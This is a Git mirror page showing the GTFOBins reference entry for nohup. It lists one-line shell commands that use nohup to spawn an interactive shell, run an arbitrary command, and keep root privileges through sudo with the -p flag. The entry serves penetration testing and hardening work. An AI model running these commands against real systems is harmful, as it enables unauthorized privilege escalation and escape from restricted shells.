This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-03 10:18:54 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
c09b95053f8f99a99b2bfb19807e4284214a4d4c
GTFOBins.github.io
/
_gtfobins
/
nohup.md
Shikata
db40142ea7
Remove redundant sudo from SUID category
2021-01-11 12:31:54 +02:00
334 B
Raw
Blame
History
functions
functions
shell
command
sudo
suid
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
Reference in New Issue
View Git Blame
Copy Permalink